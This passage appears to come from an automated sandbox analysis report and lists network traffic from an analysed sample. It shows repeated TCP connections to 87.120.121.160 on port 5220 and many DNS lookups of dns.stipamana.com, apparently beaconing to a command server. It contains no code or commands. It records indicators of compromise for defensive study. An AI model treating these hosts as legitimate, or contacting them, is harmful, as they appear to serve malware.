                                              Dec 12, 2024 21:51:11.182476997 CET492075220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:13.350821018 CET52204920787.120.121.160192.168.2.22
                                              Dec 12, 2024 21:51:13.351038933 CET492075220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:18.486798048 CET492085220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:18.606945038 CET52204920887.120.121.160192.168.2.22
                                              Dec 12, 2024 21:51:18.607173920 CET492085220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:20.739490986 CET52204920887.120.121.160192.168.2.22
                                              Dec 12, 2024 21:51:20.739574909 CET492085220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:25.879935980 CET492095220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:25.999871016 CET52204920987.120.121.160192.168.2.22
                                              Dec 12, 2024 21:51:26.000193119 CET492095220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:28.160065889 CET52204920987.120.121.160192.168.2.22
                                              Dec 12, 2024 21:51:28.160176992 CET492095220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:33.307521105 CET492105220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:33.427261114 CET52204921087.120.121.160192.168.2.22
                                              Dec 12, 2024 21:51:33.427372932 CET492105220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:35.550585032 CET52204921087.120.121.160192.168.2.22
                                              Dec 12, 2024 21:51:35.550822020 CET492105220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:40.695082903 CET492115220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:40.814994097 CET52204921187.120.121.160192.168.2.22
                                              Dec 12, 2024 21:51:40.815187931 CET492115220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:42.941787004 CET52204921187.120.121.160192.168.2.22
                                              Dec 12, 2024 21:51:42.941967010 CET492115220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:48.076334000 CET492125220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:48.196594000 CET52204921287.120.121.160192.168.2.22
                                              Dec 12, 2024 21:51:48.196932077 CET492125220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:50.351327896 CET52204921287.120.121.160192.168.2.22
                                              Dec 12, 2024 21:51:50.351403952 CET492125220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:55.497977018 CET492135220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:55.620469093 CET52204921387.120.121.160192.168.2.22
                                              Dec 12, 2024 21:51:55.620784044 CET492135220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:57.773490906 CET52204921387.120.121.160192.168.2.22
                                              Dec 12, 2024 21:51:57.773586035 CET492135220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:02.905169010 CET492145220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:03.025105000 CET52204921487.120.121.160192.168.2.22
                                              Dec 12, 2024 21:52:03.025368929 CET492145220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:05.179929018 CET52204921487.120.121.160192.168.2.22
                                              Dec 12, 2024 21:52:05.180042028 CET492145220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:10.326616049 CET492155220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:10.447619915 CET52204921587.120.121.160192.168.2.22
                                              Dec 12, 2024 21:52:10.447758913 CET492155220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:12.602269888 CET52204921587.120.121.160192.168.2.22
                                              Dec 12, 2024 21:52:12.602442026 CET492155220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:17.743964911 CET492165220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:17.863907099 CET52204921687.120.121.160192.168.2.22
                                              Dec 12, 2024 21:52:17.864068031 CET492165220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:20.013031960 CET52204921687.120.121.160192.168.2.22
                                              Dec 12, 2024 21:52:20.013232946 CET492165220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:25.160921097 CET492175220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:25.282030106 CET52204921787.120.121.160192.168.2.22
                                              Dec 12, 2024 21:52:25.282180071 CET492175220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:27.411122084 CET52204921787.120.121.160192.168.2.22
                                              Dec 12, 2024 21:52:27.411293983 CET492175220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:32.567487955 CET492185220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:32.687442064 CET52204921887.120.121.160192.168.2.22
                                              Dec 12, 2024 21:52:32.687582970 CET492185220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:34.852461100 CET52204921887.120.121.160192.168.2.22
                                              Dec 12, 2024 21:52:34.852586985 CET492185220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:39.998007059 CET492195220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:40.118215084 CET52204921987.120.121.160192.168.2.22
                                              Dec 12, 2024 21:52:40.118396997 CET492195220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:42.239886999 CET52204921987.120.121.160192.168.2.22
                                              Dec 12, 2024 21:52:42.240014076 CET492195220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:47.366841078 CET492205220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:47.486732006 CET52204922087.120.121.160192.168.2.22
                                              Dec 12, 2024 21:52:47.486951113 CET492205220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:49.614516020 CET52204922087.120.121.160192.168.2.22
                                              Dec 12, 2024 21:52:49.614721060 CET492205220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:54.757549047 CET492215220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:54.877505064 CET52204922187.120.121.160192.168.2.22
                                              Dec 12, 2024 21:52:54.877794981 CET492215220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:57.012444019 CET52204922187.120.121.160192.168.2.22
                                              Dec 12, 2024 21:52:57.012675047 CET492215220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:02.138873100 CET492225220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:02.258922100 CET52204922287.120.121.160192.168.2.22
                                              Dec 12, 2024 21:53:02.259043932 CET492225220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:04.399147987 CET52204922287.120.121.160192.168.2.22
                                              Dec 12, 2024 21:53:04.399437904 CET492225220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:09.554881096 CET492235220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:09.675498009 CET52204922387.120.121.160192.168.2.22
                                              Dec 12, 2024 21:53:09.675607920 CET492235220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:11.802289963 CET52204922387.120.121.160192.168.2.22
                                              Dec 12, 2024 21:53:11.802819014 CET492235220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:16.935046911 CET492245220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:17.055265903 CET52204922487.120.121.160192.168.2.22
                                              Dec 12, 2024 21:53:17.055357933 CET492245220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:19.242007017 CET52204922487.120.121.160192.168.2.22
                                              Dec 12, 2024 21:53:19.242132902 CET492245220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:24.388490915 CET492255220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:24.509037018 CET52204922587.120.121.160192.168.2.22
                                              Dec 12, 2024 21:53:24.509356022 CET492255220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:26.669969082 CET52204922587.120.121.160192.168.2.22
                                              Dec 12, 2024 21:53:26.670469046 CET492255220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:31.802896023 CET492265220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:31.922934055 CET52204922687.120.121.160192.168.2.22
                                              Dec 12, 2024 21:53:31.923070908 CET492265220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:34.073133945 CET52204922687.120.121.160192.168.2.22
                                              Dec 12, 2024 21:53:34.073559999 CET492265220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:39.217202902 CET492275220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:39.337227106 CET52204922787.120.121.160192.168.2.22
                                              Dec 12, 2024 21:53:39.337435007 CET492275220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:41.523745060 CET52204922787.120.121.160192.168.2.22
                                              Dec 12, 2024 21:53:41.524039984 CET492275220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:46.660341978 CET492285220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:46.780206919 CET52204922887.120.121.160192.168.2.22
                                              Dec 12, 2024 21:53:46.780356884 CET492285220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:48.912826061 CET52204922887.120.121.160192.168.2.22
                                              Dec 12, 2024 21:53:48.913031101 CET492285220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:54.050513029 CET492295220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:54.172976017 CET52204922987.120.121.160192.168.2.22
                                              Dec 12, 2024 21:53:54.173089027 CET492295220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:56.334779978 CET52204922987.120.121.160192.168.2.22
                                              Dec 12, 2024 21:53:56.334953070 CET492295220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:54:01.467451096 CET492305220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:54:01.588845015 CET52204923087.120.121.160192.168.2.22
                                              Dec 12, 2024 21:54:01.589147091 CET492305220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:54:03.745179892 CET52204923087.120.121.160192.168.2.22
                                              Dec 12, 2024 21:54:03.745348930 CET492305220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:54:08.889147997 CET492315220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:54:09.009484053 CET52204923187.120.121.160192.168.2.22
                                              Dec 12, 2024 21:54:09.009763002 CET492315220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:54:10.245476961 CET52204923187.120.121.160192.168.2.22
                                              Dec 12, 2024 21:54:10.287439108 CET492315220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:54:10.407573938 CET52204923187.120.121.160192.168.2.22
                                              Dec 12, 2024 21:54:19.578073978 CET52204923187.120.121.160192.168.2.22
                                              Dec 12, 2024 21:54:19.578587055 CET492315220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:54:24.726164103 CET492325220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:54:24.846676111 CET52204923287.120.121.160192.168.2.22
                                              Dec 12, 2024 21:54:24.847254038 CET492325220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:54:26.997773886 CET52204923287.120.121.160192.168.2.22
                                              Dec 12, 2024 21:54:26.998219013 CET492325220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:54:32.146852970 CET492335220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:54:32.267647028 CET52204923387.120.121.160192.168.2.22
                                              Dec 12, 2024 21:54:32.267987967 CET492335220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:54:34.420504093 CET52204923387.120.121.160192.168.2.22
                                              Dec 12, 2024 21:54:34.420627117 CET492335220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:54:39.546040058 CET492345220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:54:39.666182995 CET52204923487.120.121.160192.168.2.22
                                              Dec 12, 2024 21:54:39.666328907 CET492345220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:54:41.808653116 CET52204923487.120.121.160192.168.2.22
                                              Dec 12, 2024 21:54:41.809091091 CET492345220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:54:46.941155910 CET492355220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:54:47.061180115 CET52204923587.120.121.160192.168.2.22
                                              Dec 12, 2024 21:54:47.061414957 CET492355220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:54:49.182074070 CET52204923587.120.121.160192.168.2.22
                                              Dec 12, 2024 21:54:49.182459116 CET492355220192.168.2.2287.120.121.160

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 12, 2024 21:45:41.232595921 CET5456253192.168.2.228.8.8.8
                                              Dec 12, 2024 21:45:41.603100061 CET53545628.8.8.8192.168.2.22
                                              Dec 12, 2024 21:45:50.418020964 CET5291753192.168.2.228.8.8.8
                                              Dec 12, 2024 21:45:50.788270950 CET53529178.8.8.8192.168.2.22
                                              Dec 12, 2024 21:45:58.064232111 CET6275153192.168.2.228.8.8.8
                                              Dec 12, 2024 21:45:58.198769093 CET53627518.8.8.8192.168.2.22
                                              Dec 12, 2024 21:46:05.465405941 CET5789353192.168.2.228.8.8.8
                                              Dec 12, 2024 21:46:05.837680101 CET53578938.8.8.8192.168.2.22
                                              Dec 12, 2024 21:46:13.118576050 CET5482153192.168.2.228.8.8.8
                                              Dec 12, 2024 21:46:13.491419077 CET53548218.8.8.8192.168.2.22
                                              Dec 12, 2024 21:46:20.784152985 CET5471953192.168.2.228.8.8.8
                                              Dec 12, 2024 21:46:21.156843901 CET53547198.8.8.8192.168.2.22
                                              Dec 12, 2024 21:46:28.411036015 CET4988153192.168.2.228.8.8.8
                                              Dec 12, 2024 21:46:28.545562983 CET53498818.8.8.8192.168.2.22
                                              Dec 12, 2024 21:46:35.823601007 CET5499853192.168.2.228.8.8.8
                                              Dec 12, 2024 21:46:35.946887970 CET53549988.8.8.8192.168.2.22
                                              Dec 12, 2024 21:46:43.226644993 CET5278153192.168.2.228.8.8.8
                                              Dec 12, 2024 21:46:43.361864090 CET53527818.8.8.8192.168.2.22
                                              Dec 12, 2024 21:46:50.611470938 CET6392653192.168.2.228.8.8.8
                                              Dec 12, 2024 21:46:50.745820045 CET53639268.8.8.8192.168.2.22
                                              Dec 12, 2024 21:46:58.002760887 CET6551053192.168.2.228.8.8.8
                                              Dec 12, 2024 21:46:58.137223005 CET53655108.8.8.8192.168.2.22
                                              Dec 12, 2024 21:47:05.396903992 CET6267253192.168.2.228.8.8.8
                                              Dec 12, 2024 21:47:05.531486988 CET53626728.8.8.8192.168.2.22
                                              Dec 12, 2024 21:47:12.804578066 CET5647553192.168.2.228.8.8.8
                                              Dec 12, 2024 21:47:12.938827038 CET53564758.8.8.8192.168.2.22
                                              Dec 12, 2024 21:47:20.183312893 CET4938453192.168.2.228.8.8.8
                                              Dec 12, 2024 21:47:20.306443930 CET53493848.8.8.8192.168.2.22
                                              Dec 12, 2024 21:47:27.599539995 CET5484253192.168.2.228.8.8.8
                                              Dec 12, 2024 21:47:27.974983931 CET53548428.8.8.8192.168.2.22
                                              Dec 12, 2024 21:47:35.252535105 CET5810553192.168.2.228.8.8.8
                                              Dec 12, 2024 21:47:35.624083042 CET53581058.8.8.8192.168.2.22
                                              Dec 12, 2024 21:47:42.884737015 CET6492853192.168.2.228.8.8.8
                                              Dec 12, 2024 21:47:43.018866062 CET53649288.8.8.8192.168.2.22
                                              Dec 12, 2024 21:47:50.369386911 CET5739053192.168.2.228.8.8.8
                                              Dec 12, 2024 21:47:50.505089998 CET53573908.8.8.8192.168.2.22
                                              Dec 12, 2024 21:47:57.783576012 CET5809553192.168.2.228.8.8.8
                                              Dec 12, 2024 21:47:57.922924042 CET53580958.8.8.8192.168.2.22
                                              Dec 12, 2024 21:48:05.222099066 CET5426153192.168.2.228.8.8.8
                                              Dec 12, 2024 21:48:05.356887102 CET53542618.8.8.8192.168.2.22
                                              Dec 12, 2024 21:48:12.664558887 CET6050753192.168.2.228.8.8.8
                                              Dec 12, 2024 21:48:12.789191008 CET53605078.8.8.8192.168.2.22
                                              Dec 12, 2024 21:48:20.039948940 CET5044653192.168.2.228.8.8.8
                                              Dec 12, 2024 21:48:20.175071955 CET53504468.8.8.8192.168.2.22
                                              Dec 12, 2024 21:48:27.484338045 CET5593953192.168.2.228.8.8.8
                                              Dec 12, 2024 21:48:27.608385086 CET53559398.8.8.8192.168.2.22
                                              Dec 12, 2024 21:48:34.893986940 CET4960853192.168.2.228.8.8.8
                                              Dec 12, 2024 21:48:35.028428078 CET53496088.8.8.8192.168.2.22
                                              Dec 12, 2024 21:48:42.307828903 CET6148653192.168.2.228.8.8.8
                                              Dec 12, 2024 21:48:42.443259001 CET53614868.8.8.8192.168.2.22
                                              Dec 12, 2024 21:48:49.730556965 CET6245353192.168.2.228.8.8.8
                                              Dec 12, 2024 21:48:49.865164042 CET53624538.8.8.8192.168.2.22
                                              Dec 12, 2024 21:48:57.122718096 CET5056853192.168.2.228.8.8.8
                                              Dec 12, 2024 21:48:57.256814957 CET53505688.8.8.8192.168.2.22
                                              Dec 12, 2024 21:49:04.530304909 CET6146753192.168.2.228.8.8.8
                                              Dec 12, 2024 21:49:04.665467024 CET53614678.8.8.8192.168.2.22
                                              Dec 12, 2024 21:49:11.941971064 CET6161853192.168.2.228.8.8.8
                                              Dec 12, 2024 21:49:12.076205969 CET53616188.8.8.8192.168.2.22
                                              Dec 12, 2024 21:49:19.341698885 CET5442253192.168.2.228.8.8.8
                                              Dec 12, 2024 21:49:19.476135969 CET53544228.8.8.8192.168.2.22
                                              Dec 12, 2024 21:49:26.872906923 CET5207453192.168.2.228.8.8.8
                                              Dec 12, 2024 21:49:27.244282007 CET53520748.8.8.8192.168.2.22
                                              Dec 12, 2024 21:49:34.505686045 CET5033753192.168.2.228.8.8.8
                                              Dec 12, 2024 21:49:34.640294075 CET53503378.8.8.8192.168.2.22
                                              Dec 12, 2024 21:49:41.908653021 CET6182653192.168.2.228.8.8.8
                                              Dec 12, 2024 21:49:42.042783976 CET53618268.8.8.8192.168.2.22
                                              Dec 12, 2024 21:49:49.296081066 CET5632953192.168.2.228.8.8.8
                                              Dec 12, 2024 21:49:49.430185080 CET53563298.8.8.8192.168.2.22
                                              Dec 12, 2024 21:49:56.762053967 CET6346953192.168.2.228.8.8.8
                                              Dec 12, 2024 21:49:56.896336079 CET53634698.8.8.8192.168.2.22
                                              Dec 12, 2024 21:50:04.267986059 CET5944753192.168.2.228.8.8.8
                                              Dec 12, 2024 21:50:04.402148962 CET53594478.8.8.8192.168.2.22
                                              Dec 12, 2024 21:50:11.661416054 CET5182853192.168.2.228.8.8.8
                                              Dec 12, 2024 21:50:11.784126997 CET53518288.8.8.8192.168.2.22
                                              Dec 12, 2024 21:50:19.052421093 CET5340653192.168.2.228.8.8.8
                                              Dec 12, 2024 21:50:19.187814951 CET53534068.8.8.8192.168.2.22
                                              Dec 12, 2024 21:50:26.473809004 CET5634553192.168.2.228.8.8.8
                                              Dec 12, 2024 21:50:26.607886076 CET53563458.8.8.8192.168.2.22
                                              Dec 12, 2024 21:50:33.892271996 CET5187053192.168.2.228.8.8.8
                                              Dec 12, 2024 21:50:34.026778936 CET53518708.8.8.8192.168.2.22
                                              Dec 12, 2024 21:50:41.288825989 CET6500953192.168.2.228.8.8.8
                                              Dec 12, 2024 21:50:41.424036026 CET53650098.8.8.8192.168.2.22
                                              Dec 12, 2024 21:50:48.709347963 CET6495653192.168.2.228.8.8.8
                                              Dec 12, 2024 21:50:48.844182968 CET53649568.8.8.8192.168.2.22
                                              Dec 12, 2024 21:50:56.119364977 CET5452153192.168.2.228.8.8.8
                                              Dec 12, 2024 21:50:56.242716074 CET53545218.8.8.8192.168.2.22
                                              Dec 12, 2024 21:51:03.540868044 CET4975053192.168.2.228.8.8.8
                                              Dec 12, 2024 21:51:03.665529966 CET53497508.8.8.8192.168.2.22
                                              Dec 12, 2024 21:51:10.926779032 CET6468753192.168.2.228.8.8.8
                                              Dec 12, 2024 21:51:11.061579943 CET53646878.8.8.8192.168.2.22
                                              Dec 12, 2024 21:51:18.351907969 CET6508453192.168.2.228.8.8.8
                                              Dec 12, 2024 21:51:18.486056089 CET53650848.8.8.8192.168.2.22
                                              Dec 12, 2024 21:51:25.744587898 CET6337353192.168.2.228.8.8.8
                                              Dec 12, 2024 21:51:25.878966093 CET53633738.8.8.8192.168.2.22
                                              Dec 12, 2024 21:51:33.171979904 CET5620753192.168.2.228.8.8.8
                                              Dec 12, 2024 21:51:33.306296110 CET53562078.8.8.8192.168.2.22
                                              Dec 12, 2024 21:51:40.557590008 CET5195553192.168.2.228.8.8.8
                                              Dec 12, 2024 21:51:40.693830967 CET53519558.8.8.8192.168.2.22
                                              Dec 12, 2024 21:51:47.941709042 CET5897153192.168.2.228.8.8.8
                                              Dec 12, 2024 21:51:48.075679064 CET53589718.8.8.8192.168.2.22
                                              Dec 12, 2024 21:51:55.361670971 CET5101453192.168.2.228.8.8.8
                                              Dec 12, 2024 21:51:55.496759892 CET53510148.8.8.8192.168.2.22
                                              Dec 12, 2024 21:52:02.781596899 CET4969053192.168.2.228.8.8.8
                                              Dec 12, 2024 21:52:02.904727936 CET53496908.8.8.8192.168.2.22
                                              Dec 12, 2024 21:52:10.190834999 CET6016953192.168.2.228.8.8.8
                                              Dec 12, 2024 21:52:10.325464010 CET53601698.8.8.8192.168.2.22
                                              Dec 12, 2024 21:52:17.607659101 CET5306053192.168.2.228.8.8.8
                                              Dec 12, 2024 21:52:17.743431091 CET53530608.8.8.8192.168.2.22
                                              Dec 12, 2024 21:52:25.024692059 CET4994953192.168.2.228.8.8.8
                                              Dec 12, 2024 21:52:25.159442902 CET53499498.8.8.8192.168.2.22
                                              Dec 12, 2024 21:52:32.431931019 CET5402753192.168.2.228.8.8.8
                                              Dec 12, 2024 21:52:32.566340923 CET53540278.8.8.8192.168.2.22
                                              Dec 12, 2024 21:52:39.862896919 CET6395053192.168.2.228.8.8.8
                                              Dec 12, 2024 21:52:39.997255087 CET53639508.8.8.8192.168.2.22
                                              Dec 12, 2024 21:52:47.243031979 CET5825753192.168.2.228.8.8.8
                                              Dec 12, 2024 21:52:47.366159916 CET53582578.8.8.8192.168.2.22
                                              Dec 12, 2024 21:52:54.621396065 CET5473853192.168.2.228.8.8.8
                                              Dec 12, 2024 21:52:54.755981922 CET53547388.8.8.8192.168.2.22
                                              Dec 12, 2024 21:53:02.013331890 CET4947853192.168.2.228.8.8.8
                                              Dec 12, 2024 21:53:02.137824059 CET53494788.8.8.8192.168.2.22
                                              Dec 12, 2024 21:53:09.418307066 CET4928853192.168.2.228.8.8.8
                                              Dec 12, 2024 21:53:09.553461075 CET53492888.8.8.8192.168.2.22
                                              Dec 12, 2024 21:53:16.799825907 CET6159853192.168.2.228.8.8.8
                                              Dec 12, 2024 21:53:16.934592009 CET53615988.8.8.8192.168.2.22
                                              Dec 12, 2024 21:53:24.251733065 CET5875453192.168.2.228.8.8.8
                                              Dec 12, 2024 21:53:24.387618065 CET53587548.8.8.8192.168.2.22
                                              Dec 12, 2024 21:53:31.666935921 CET4922653192.168.2.228.8.8.8
                                              Dec 12, 2024 21:53:31.802103043 CET53492268.8.8.8192.168.2.22
                                              Dec 12, 2024 21:53:39.080763102 CET5469553192.168.2.228.8.8.8
                                              Dec 12, 2024 21:53:39.215998888 CET53546958.8.8.8192.168.2.22
                                              Dec 12, 2024 21:53:46.536843061 CET6160153192.168.2.228.8.8.8
                                              Dec 12, 2024 21:53:46.659801006 CET53616018.8.8.8192.168.2.22
                                              Dec 12, 2024 21:53:53.914627075 CET5461553192.168.2.228.8.8.8
                                              Dec 12, 2024 21:53:54.049069881 CET53546158.8.8.8192.168.2.22
                                              Dec 12, 2024 21:54:01.342457056 CET5495053192.168.2.228.8.8.8
                                              Dec 12, 2024 21:54:01.466228962 CET53549508.8.8.8192.168.2.22
                                              Dec 12, 2024 21:54:08.750524998 CET6421553192.168.2.228.8.8.8
                                              Dec 12, 2024 21:54:08.888257027 CET53642158.8.8.8192.168.2.22
                                              Dec 12, 2024 21:54:24.589775085 CET5960453192.168.2.228.8.8.8
                                              Dec 12, 2024 21:54:24.724996090 CET53596048.8.8.8192.168.2.22
                                              Dec 12, 2024 21:54:32.008743048 CET4952053192.168.2.228.8.8.8
                                              Dec 12, 2024 21:54:32.145724058 CET53495208.8.8.8192.168.2.22
                                              Dec 12, 2024 21:54:39.421634912 CET5303153192.168.2.228.8.8.8
                                              Dec 12, 2024 21:54:39.544877052 CET53530318.8.8.8192.168.2.22
                                              Dec 12, 2024 21:54:46.816812038 CET5311253192.168.2.228.8.8.8
                                              Dec 12, 2024 21:54:46.940597057 CET53531128.8.8.8192.168.2.22

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Dec 12, 2024 21:45:41.232595921 CET192.168.2.228.8.8.80x49d6Standard query (0)www.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:45:50.418020964 CET192.168.2.228.8.8.80x566Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:45:58.064232111 CET192.168.2.228.8.8.80xf998Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:46:05.465405941 CET192.168.2.228.8.8.80xbf7fStandard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:46:13.118576050 CET192.168.2.228.8.8.80x2a6aStandard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:46:20.784152985 CET192.168.2.228.8.8.80x736dStandard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:46:28.411036015 CET192.168.2.228.8.8.80x3d2dStandard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:46:35.823601007 CET192.168.2.228.8.8.80x30d0Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:46:43.226644993 CET192.168.2.228.8.8.80xa0feStandard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:46:50.611470938 CET192.168.2.228.8.8.80x4dfaStandard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:46:58.002760887 CET192.168.2.228.8.8.80x384eStandard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:47:05.396903992 CET192.168.2.228.8.8.80xff0fStandard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:47:12.804578066 CET192.168.2.228.8.8.80xc30Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:47:20.183312893 CET192.168.2.228.8.8.80x95f3Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:47:27.599539995 CET192.168.2.228.8.8.80x60f6Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:47:35.252535105 CET192.168.2.228.8.8.80x47c2Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:47:42.884737015 CET192.168.2.228.8.8.80xa868Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:47:50.369386911 CET192.168.2.228.8.8.80xe9e1Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:47:57.783576012 CET192.168.2.228.8.8.80xa3fStandard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:48:05.222099066 CET192.168.2.228.8.8.80x72c6Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:48:12.664558887 CET192.168.2.228.8.8.80xbbbStandard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:48:20.039948940 CET192.168.2.228.8.8.80x7080Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:48:27.484338045 CET192.168.2.228.8.8.80xf865Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:48:34.893986940 CET192.168.2.228.8.8.80x4baeStandard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:48:42.307828903 CET192.168.2.228.8.8.80x8693Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:48:49.730556965 CET192.168.2.228.8.8.80xd45cStandard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:48:57.122718096 CET192.168.2.228.8.8.80x60b4Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:49:04.530304909 CET192.168.2.228.8.8.80x7fa0Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:49:11.941971064 CET192.168.2.228.8.8.80xd81cStandard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:49:19.341698885 CET192.168.2.228.8.8.80xb47fStandard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:49:26.872906923 CET192.168.2.228.8.8.80xd0dbStandard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:49:34.505686045 CET192.168.2.228.8.8.80xa9b0Standard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
                                              Dec 12, 2024 21:49:41.908653021 CET192.168.2.228.8.8.80xb4dfStandard query (0)dns.stipamana.comA (IP address)IN (0x0001)false
